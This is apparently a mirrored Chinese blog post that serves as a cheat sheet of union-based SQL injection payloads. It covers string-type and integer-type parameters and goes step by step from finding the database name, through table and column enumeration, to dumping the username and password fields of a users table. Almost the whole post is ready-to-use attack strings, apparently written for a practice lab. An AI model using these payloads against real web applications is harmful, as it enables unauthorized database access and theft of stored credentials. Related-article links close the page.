zoukankan      html  css  js  c++  java
  • sql注入

    一 、字符型(需要闭合特意去 ' ' )

    【1】查当前库名

    ?id=' union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA where '1'='1
    
    ?id=' union select 1,2,database()-- 随便     --后面有个空格再随便输个字母
    

    。。。。。。。。。。。。。。。。。。。。假设返回库名为security库
    【2】查security库的表名

    ?id=' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='security'--+
    

    。。。。。。。。。。。。。。。。。。。。假设返回表名为users

    【3】查security库users表的列名

    ?id=' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='security'--+
    

    。。。。。。。。。。。。。。。。。。。。假设返回username,password

    【4】查security库 users表的各列里面的字段

    ?id=' union select 1,group_concat(username),group_concat(password) from security.users--+
    

    二、整型(不需要闭合特意去 ' ' )

    【1】查当前库名

    ?id=0 union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA
    
    ?id=0 union select 1,2,database()
    

    。。。。。。。。。。。。。。。。。。。。假设返回库名为security库

    【2】查security库的表名

    ?id=0 union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='security'
    

    。。。。。。。。。。。。。。。。。。。。假设返回表名为users

    【3】查security库users表的列名

    ?id=0 union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='security'
    

    。。。。。。。。。。。。。。。。。。。。假设返回username,password

    【4】查security库 users表的各列里面的字段

    ?id=0 union select 1,group_concat(username),group_concat(password) from security.users
    

    持续更新。。。。。。。。。。

  • 相关阅读:
    Autodesk Infrastructure Map Server 2012(MapGuide 2012)开发WebCast将于6月1日上午进行
    Autodesk Infrastructure Map Server(AIMS) 2012 常见错误
    Map 3D / MapGuide 连接 Oracle 找不到oci.dll?
    Mysql数据库监控要做好哪些?
    Centos删除目录下所有指定后缀或者包括指定字符的文件
    了解一下Mysql的MDL锁
    flash工具快捷键
    (转)AS3焦点事件
    (Matrix3D)坑爹的flash帮助文档
    (转)Flex编译参数
  • 原文地址:https://www.cnblogs.com/WTa0/p/11810830.html
Copyright © 2011-2022 走看看